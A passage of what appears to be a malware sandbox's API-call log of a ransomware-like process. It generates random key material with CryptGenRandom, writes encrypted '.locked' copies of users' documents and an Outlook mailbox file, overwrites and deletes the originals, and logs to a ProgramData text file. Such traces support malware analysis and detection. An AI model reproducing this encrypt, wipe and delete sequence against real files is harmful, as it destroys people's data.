dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b0 [0289.069] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0289.660] SetEvent (hEvent=0x1b8) returned 1 [0289.660] GetConsoleMode (in: hConsoleHandle=0x1b0, lpMode=0x1276ae88 | out: lpMode=0x1276ae88) returned 0 [0289.660] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0290.133] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0290.170] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0290.193] SetEvent (hEvent=0x104) returned 1 [0290.193] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0290.258] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\yjUz3WLu\\b1s7y96Y6gVCDj\\53CjZJnv.avi" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\yjuz3wlu\\b1s7y96y6gvcdj\\53cjzjnv.avi")) returned 1 [0290.403] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0292.262] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x125fc000*, nNumberOfCharsToWrite=0xb, lpNumberOfCharsWritten=0x123a3a24, lpReserved=0x0 | out: lpBuffer=0x125fc000*, lpNumberOfCharsWritten=0x123a3a24*=0xb) returned 1 [0292.830] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\GPvOBFfXu_XAefB06.doc" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\gpvobffxu_xaefb06.doc"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1bc [0292.830] GetConsoleMode (in: hConsoleHandle=0x1bc, lpMode=0x123a3d9c | out: lpMode=0x123a3d9c) returned 0 [0292.830] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\GPvOBFfXu_XAefB06.doc.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\gpvobffxu_xaefb06.doc.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x180 [0292.915] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0293.048] GetConsoleMode (in: hConsoleHandle=0x180, lpMode=0x123a3d9c | out: lpMode=0x123a3d9c) returned 0 [0293.048] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0293.546] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0293.655] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0293.675] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\5yfr.docx.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\5yfr.docx.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x218 [0295.385] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0295.559] SetEvent (hEvent=0x150) returned 1 [0295.559] GetConsoleMode (in: hConsoleHandle=0x218, lpMode=0x1249ed9c | out: lpMode=0x1249ed9c) returned 0 [0295.559] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0295.720] SetEvent (hEvent=0x14c) returned 1 [0295.720] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0295.784] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0295.977] SetEvent (hEvent=0x104) returned 1 [0295.977] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0x1) returned 0x102 [0296.260] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0296.260] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0x1) returned 0x102 [0296.325] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0296.326] SetEvent (hEvent=0x22c) returned 1 [0296.326] SetEvent (hEvent=0x104) returned 1 [0296.326] SetEvent (hEvent=0x134) returned 1 [0296.326] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0296.373] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x332efb34, ulCount=0x10, ulNumEntriesRemoved=0x332efb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x332efb34, ulNumEntriesRemoved=0x332efb14) returned 0 [0296.373] SetEvent (hEvent=0x150) returned 1 [0296.373] SetEvent (hEvent=0x22c) returned 1 [0296.373] SetEvent (hEvent=0x104) returned 1 [0296.373] SetEvent (hEvent=0x134) returned 1 [0296.373] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x1234c220 | out: pbBuffer=0x1234c220) returned 1 [0296.373] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x1234e070 | out: pbBuffer=0x1234e070) returned 1 [0296.373] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12702401 | out: pbBuffer=0x12702401) returned 1 [0296.374] WriteFile (in: hFile=0x1b0, lpBuffer=0x1266f000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1239fd78, lpOverlapped=0x0 | out: lpBuffer=0x1266f000*, lpNumberOfBytesWritten=0x1239fd78*=0x80, lpOverlapped=0x0) returned 1 [0296.438] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0x1) returned 0x102 [0296.475] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0296.475] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x332efb30, ulCount=0x10, ulNumEntriesRemoved=0x332efb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x332efb30, ulNumEntriesRemoved=0x332efb10) returned 0 [0296.475] SetEvent (hEvent=0x22c) returned 1 [0296.475] SetEvent (hEvent=0x104) returned 1 [0296.475] SetEvent (hEvent=0x134) returned 1 [0296.475] ReadFile (in: hFile=0x19c, lpBuffer=0x13e0c000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x1239fd68, lpOverlapped=0x0 | out: lpBuffer=0x13e0c000*, lpNumberOfBytesRead=0x1239fd68*=0x42400, lpOverlapped=0x0) returned 1 [0296.580] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0297.384] WriteFile (in: hFile=0x1b0, lpBuffer=0x13e0c000*, nNumberOfBytesToWrite=0x42400, lpNumberOfBytesWritten=0x1239fd74, lpOverlapped=0x0 | out: lpBuffer=0x13e0c000*, lpNumberOfBytesWritten=0x1239fd74*=0x42400, lpOverlapped=0x0) returned 1 [0297.476] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0297.991] SetEvent (hEvent=0x150) returned 1 [0297.991] SetEvent (hEvent=0x12c) returned 1 [0297.991] ReadFile (in: hFile=0x19c, lpBuffer=0x13e0c000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x1239fd68, lpOverlapped=0x0 | out: lpBuffer=0x13e0c000*, lpNumberOfBytesRead=0x1239fd68*=0x0, lpOverlapped=0x0) returned 1 [0297.991] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0298.815] CloseHandle (hObject=0x1b0) returned 1 [0298.867] CloseHandle (hObject=0x19c) returned 1 [0298.868] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x19c [0298.868] GetConsoleMode (in: hConsoleHandle=0x19c, lpMode=0x1239fe94 | out: lpMode=0x1239fe94) returned 0 [0298.868] WriteFile (in: hFile=0x19c, lpBuffer=0x125740a0*, nNumberOfBytesToWrite=0x46, lpNumberOfBytesWritten=0x1239fe64, lpOverlapped=0x0 | out: lpBuffer=0x125740a0*, lpNumberOfBytesWritten=0x1239fe64*=0x46, lpOverlapped=0x0) returned 1 [0298.868] CloseHandle (hObject=0x19c) returned 1 [0298.871] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\Outlook Files\\achoo@gdllo.de.pst" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\outlook files\\achoo@gdllo.de.pst")) returned 1 [0298.922] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\Outlook Files\\achoo@gdllo.de.pst" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\outlook files\\achoo@gdllo.de.pst"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x180 [0299.262] GetConsoleMode (in: hConsoleHandle=0x180, lpMode=0x1239fe88 | out: lpMode=0x1239fe88) returned 0 [0299.263] WriteFile (in: hFile=0x180, lpBuffer=0x1358e000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x1239fe78, lpOverlapped=0x0 | out: lpBuffer=0x1358e000*, lpNumberOfBytesWritten=0x1239fe78*=0xfa000, lpOverlapped=0x0) returned 1 [0299.581] CloseHandle (hObject=0x180) returned 1 [0299.652] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\Outlook Files\\achoo@gdllo.de.pst" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\outlook files\\achoo@gdllo.de.pst")) returned 1 [0299.668] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1234c220*, nNumberOfCharsToWrite=0xb, lpNumberOfCharsWritten=0x1239fa24, lpReserved=0x0 | out: lpBuffer=0x1234c220*, lpNumberOfCharsWritten=0x1239fa24*=0xb) returned 1 [0299.718] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0299.739] SetEvent (hEvent=0x214) returned 1 [0299.739] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0299.742] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0299.759] SetEvent (hEvent=0x104) returned 1 [0299.759] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0299.837] SetEvent (hEvent=0x22c) returned 1 [0299.837] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0303.755] SetEvent (hEvent=0x12c) returned 1 [0303.755] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0303.872] SetEvent (hEvent=0x198) returned 1 [0303.872] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0303.875] SetEvent (hEvent=0x21c) returned 1 [0303.875] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0303.914] SetEvent (hEvent=0x12c) returned 1 [0303.914] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x200 [0303.914] GetConsoleMode (in: hConsoleHandle=0x200, lpMode=0x124a0e94 | out: lpMode=0x124a0e94) returned 0 [0303.914] WriteFile (in: hFile=0x200, lpBuffer=0x125740a0*, nNumberOfBytesToWrite=0x4d, lpNumberOfBytesWritten=0x124a0e64, lpOverlapped=0x0 | out: lpBuffer=0x125740a0*, lpNumberOfBytesWritten=0x124a0e64*=0x4d, lpOverlapped=0x0) returned 1 [0303.914] CloseHandle (hObject=0x200) returned 1 [0303.916] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\baXS\\AZLma79E0y7Lx7ST0eS\\6wvQVTWOr1.doc" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\baxs\\azlma79e0y7lx7st0es\\6wvqvtwor1.doc")) returned 1 [0303.929] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0304.059] SetEvent (hEvent=0x198) returned 1 [0304.059] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0304.060] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0304.065] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0304.072] SetEvent (hEvent=0x184) returned 1 [0304.072] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0x1) returned 0x102 [0304.133] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0304.133] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0x1) returned 0x102 [0304.136] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0304.136] SetEvent (hEvent=0x21c) returned 1 [0304.136] SetEvent (hEvent=0x184) returned 1 [0304.136] SetEvent (hEvent=0x12c) returned 1 [0304.137] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0304.137] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x332efb34, ulCount=0x10, ulNumEntriesRemoved=0x332efb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x332efb34, ulNumEntriesRemoved=0x332efb14) returned 0 [0304.137] SetEvent (hEvent=0x150) returned 1 [0304.137] SetEvent (hEvent=0x12c) returned 1 [0304.137] SetEvent (hEvent=0x184) returned 1 [0304.137] SetEvent (hEvent=0x134) returned 1 [0304.137] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0304.162] SetEvent (hEvent=0x21c) returned 1 [0304.162] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0x1) returned 0x102 [0304.175] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0304.175] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0x1) returned 0x0 [0304.178] SetEvent (hEvent=0x21c) returned 1 [0304.178] SetEvent (hEvent=0x12c) returned 1 [0304.178] SetEvent (hEvent=0x184) returned 1 [0304.178] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0304.179] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x332efb34, ulCount=0x10, ulNumEntriesRemoved=0x332efb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x332efb34, ulNumEntriesRemoved=0x332efb14) returned 0 [0304.179] SetEvent (hEvent=0x150) returned 1 [0304.179] SetEvent (hEvent=0x21c) returned 1 [0304.179] SetEvent (hEvent=0x12c) returned 1 [0304.179] SetEvent (hEvent=0x184) returned 1 [0304.179] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x1234c220 | out: pbBuffer=0x1234c220) returned 1 [0304.179] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x1234e070 | out: pbBuffer=0x1234e070) returned 1 [0304.179] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12714001 | out: pbBuffer=0x12714001) returned 1 [0304.180] WriteFile (in: hFile=0x230, lpBuffer=0x126c6000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x123a1d78, lpOverlapped=0x0 | out: lpBuffer=0x126c6000*, lpNumberOfBytesWritten=0x123a1d78*=0x80, lpOverlapped=0x0) returned 1 [0304.183] ReadFile (in: hFile=0x1f4, lpBuffer=0x14cd0000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x123a1d68, lpOverlapped=0x0 | out: lpBuffer=0x14cd0000*, lpNumberOfBytesRead=0x123a1d68*=0xf1a1, lpOverlapped=0x0) returned 1 [0304.188] WriteFile (in: hFile=0x230, lpBuffer=0x14cd0000*, nNumberOfBytesToWrite=0xf1a1, lpNumberOfBytesWritten=0x123a1d74, lpOverlapped=0x0 | out: lpBuffer=0x14cd0000*, lpNumberOfBytesWritten=0x123a1d74*=0xf1a1, lpOverlapped=0x0) returned 1 [0304.200] ReadFile (in: hFile=0x1f4, lpBuffer=0x14cd0000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x123a1d68, lpOverlapped=0x0 | out: lpBuffer=0x14cd0000*, lpNumberOfBytesRead=0x123a1d68*=0x0, lpOverlapped=0x0) returned 1 [0304.201] CloseHandle (hObject=0x230) returned 1 [0304.205] CloseHandle (hObject=0x1f4) returned 1 [0304.205] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f4 [0304.206] GetConsoleMode (in: hConsoleHandle=0x1f4, lpMode=0x123a1e94 | out: lpMode=0x123a1e94) returned 0 [0304.206] WriteFile (in: hFile=0x1f4, lpBuffer=0x126d02a0*, nNumberOfBytesToWrite=0x56, lpNumberOfBytesWritten=0x123a1e64, lpOverlapped=0x0 | out: lpBuffer=0x126d02a0*, lpNumberOfBytesWritten=0x123a1e64*=0x56, lpOverlapped=0x0) returned 1 [0304.206] CloseHandle (hObject=0x1f4) returned 1 [0304.207] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\baXS\\AZLma79E0y7Lx7ST0eS\\CJfBVMezWzfCMgvFYwf.ots" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\baxs\\azlma79e0y7lx7st0es\\cjfbvmezwzfcmgvfywf.ots")) returned 1 [0304.230] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x332efb30, ulCount=0x10, ulNumEntriesRemoved=0x332efb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x332efb30, ulNumEntriesRemoved=0x332efb10) returned 0 [0304.230] SetEvent (hEvent=0x184) returned 1 [0304.230] SetEvent (hEvent=0x12c) returned 1 [0304.255] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\baXS\\AZLma79E0y7Lx7ST0eS\\CJfBVMezWzfCMgvFYwf.ots" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\baxs\\azlma79e0y7lx7st0es\\cjfbvmezwzfcmgvfywf.ots"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x228 [0304.419] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0304.527] SetEvent (hEvent=0x150) returned 1 [0304.527] SetEvent (hEvent=0x1ac) returned 1 [0304.527] GetConsoleMode (in: hConsoleHandle=0x228, lpMode=0x123a1e88 | out: lpMode=0x123a1e88) returned 0 [0304.527] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0304.560] WriteFile (in: hFile=0x228, lpBuffer=0x140f8000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x123a1e78, lpOverlapped=0x0 | out: lpBuffer=0x140f8000*, lpNumberOfBytesWritten=0x123a1e78*=0xfa000, lpOverlapped=0x0) returned 1 [0304.588] CloseHandle (hObject=0x228) returned 1 [0304.622] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\baXS\\AZLma79E0y7Lx7ST0eS\\CJfBVMezWzfCMgvFYwf.ots" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\baxs\\azlma79e0y7lx7st0es\\cjfbvmezwzfcmgvfywf.ots")) returned 1 [0304.730] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0304.761] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0304.771] SetEvent (hEvent=0x1dc) returned 1 [0304.771] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0305.023] SetEvent (hEvent=0x1f0) returned 1 [0305.023] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0305.118] WriteFile (in: hFile=0x1c8, lpBuffer=0x12dbc000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x1276be78, lpOverlapped=0x0 | out: lpBuffer=0x12dbc000*, lpNumberOfBytesWritten=0x1276be78*=0xfa000, lpOverlapped=0x0) returned 1 [0305.141] CloseHandle (hObject=0x1c8) returned 1 [0305.191] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\baXS\\AZLma79E0y7Lx7ST0eS\\8BJrk8.pps" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\baxs\\azlma79e0y7lx7st0es\\8bjrk8.pps")) returned 1 [0305.440] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0305.717] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0305.744] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0305.760] SetEvent (hEvent=0x1dc) returned 1 [0305.760] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0305.768] SetEvent (hEvent=0x1dc) returned 1 [0305.768] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0305.792] SetEvent (hEvent=0x134) returned 1 [0305.792] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0306.776] SetEvent (hEvent=0x184) returned 1 [0306.776] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x123902a0*, nNumberOfCharsToWrite=0xb, lpNumberOfCharsWritten=0x125e7a24, lpReserved=0x0 | out: lpBuffer=0x123902a0*, lpNumberOfCharsWritten=0x125e7a24*=0xb) returned 1 [0306.783] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0306.886] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\baXS\\aSlWuoctTT0Qhm.odp" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\baxs\\aslwuocttt0qhm.odp"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f4 [0306.886] GetConsoleMode (in: hConsoleHandle=0x1f4, lpMode=0x125e7d9c | out: lpMode=0x125e7d9c) returned 0 [0306.887] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\baXS\\aSlWuoctTT0Qhm.odp.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\baxs\\aslwuocttt0qhm.odp.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b0 [0307.086] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0307.108] SetEvent (hEvent=0x150) returned 1 [0307.108] GetConsoleMode (in: hConsoleHandle=0x1b0, lpMode=0x125e7d9c | out: lpMode=0x125e7d9c) returned 0 [0307.108] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0307.310] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x125fc020 | out: pbBuffer=0x125fc020) returned 1 [0307.310] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x1234e040 | out: pbBuffer=0x1234e040) returned 1 [0307.310] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12702381 | out: pbBuffer=0x12702381) returned 1 [0307.311] WriteFile (in: hFile=0x1b0, lpBuffer=0x12622000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x125e7d78, lpOverlapped=0x0 | out: lpBuffer=0x12622000*, lpNumberOfBytesWritten=0x125e7d78*=0x80, lpOverlapped=0x0) returned 1 [0307.314] ReadFile (in: hFile=0x1f4, lpBuffer=0x14316000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x125e7d68, lpOverlapped=0x0 | out: lpBuffer=0x14316000*, lpNumberOfBytesRead=0x125e7d68*=0xed44, lpOverlapped=0x0) returned 1 [0307.317] WriteFile (in: hFile=0x1b0, lpBuffer=0x14316000*, nNumberOfBytesToWrite=0xed44, lpNumberOfBytesWritten=0x125e7d74, lpOverlapped=0x0 | out: lpBuffer=0x14316000*, lpNumberOfBytesWritten=0x125e7d74*=0xed44, lpOverlapped=0x0) returned 1 [0307.328] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0307.560] ReadFile (in: hFile=0x1f4, lpBuffer=0x14316000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x125e7d68, lpOverlapped=0x0 | out: lpBuffer=0x14316000*, lpNumberOfBytesRead=0x125e7d68*=0x0, lpOverlapped=0x0) returned 1 [0307.560] CloseHandle (hObject=0x1b0) returned 1 [0307.636] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0307.703] SetEvent (hEvent=0x150) returned 1 [0307.703] SetEvent (hEvent=0x14c) returned 1 [0307.703] CloseHandle (hObject=0x1f4) returned 1 [0307.703] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0307.887] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0307.890] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0307.964] SetEvent (hEvent=0x22c) returned 1 [0307.964] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0308.159] SetEvent (hEvent=0x134) returned 1 [0308.159] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0308.355] SetEvent (hEvent=0x1ac) returned 1 [0308.355] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0308.551] SetEvent (hEvent=0x134) returned 1 [0308.551] SetEvent (hEvent=0x22c) returned 1 [0308.551] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0308.563] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0308.750] SetEvent (hEvent=0x20c) returned 1 [0308.750] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0308.775] WriteFile (in: hFile=0x180, lpBuffer=0x17be2000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x125e7e78, lpOverlapped=0x0 | out: lpBuffer=0x17be2000*, lpNumberOfBytesWritten=0x125e7e78*=0xfa000, lpOverlapped=0x0) returned 1 [0309.253] CloseHandle (hObject=0x180) returned 1 [0309.363] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\tONZR0L5XBEql C.odt" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\tonzr0l5xbeql c.odt")) returned 1 [0309.512] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0309.517] SetEvent (hEvent=0x1e8) returned 1 [0309.517] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0309.527] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0309.539] SetEvent (hEvent=0x1e8) returned 1 [0309.539] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0309.540] SetEvent (hEvent=0x1ac) returned 1 [0309.540] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0309.568] SetEvent (hEvent=0x1ac) returned 1 [0309.568] WriteFile (in: hFile=0x230, lpBuffer=0x13bfe000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x1276be78, lpOverlapped=0x0 | out: lpBuffer=0x13bfe000*, lpNumberOfBytesWritten=0x1276be78*=0xfa000, lpOverlapped=0x0) returned 1 [0309.593] CloseHandle (hObject=0x230) returned 1 [0309.615] SetEvent (hEvent=0x1e8) returned 1 [0309.615] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0309.619] SetEvent (hEvent=0x1ac) returned 1 [0309.619] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0309.626] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0309.629] SetEvent (hEvent=0x134) returned 1 [0309.629] SetEvent (hEvent=0x220) returned 1 [0309.629] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0309.643] WaitForSingleObject (hHandle=0x190, 